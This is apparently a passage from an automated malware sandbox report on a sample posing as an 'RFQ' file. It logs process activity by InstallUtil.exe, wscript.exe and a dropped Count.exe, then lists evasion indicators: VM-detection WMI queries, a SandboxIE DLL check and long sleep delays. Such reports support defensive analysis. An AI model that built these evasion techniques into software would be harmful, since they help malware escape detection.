Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Count.exe PID: 8136, type: MEMORYSTR

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory allocated: 4C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory allocated: BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2600000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Window / User API: threadDelayed 3763	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Window / User API: threadDelayed 1393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3566	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Window / User API: threadDelayed 542	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Window / User API: threadDelayed 2849	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7724	Thread sleep count: 3763 > 30	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7724	Thread sleep count: 1393 > 30	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98489s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98184s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -98068s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -97900s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -97784s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -97641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -97523s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -97422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 7692	Thread sleep time: -97312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8044	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8044	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep count: 3566 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep count: 6203 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 7192	Thread sleep count: 542 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 7192	Thread sleep count: 2849 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99545s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99212s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -99039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -97985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 8168	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99844	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99719	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99391	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99281	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98952	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98719	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98609	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98489	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98184	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98068	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 97900	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 97784	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 97641	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 97523	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 97422	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 97312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99545	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99212	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99039	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98866	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98360	Jump to behavior
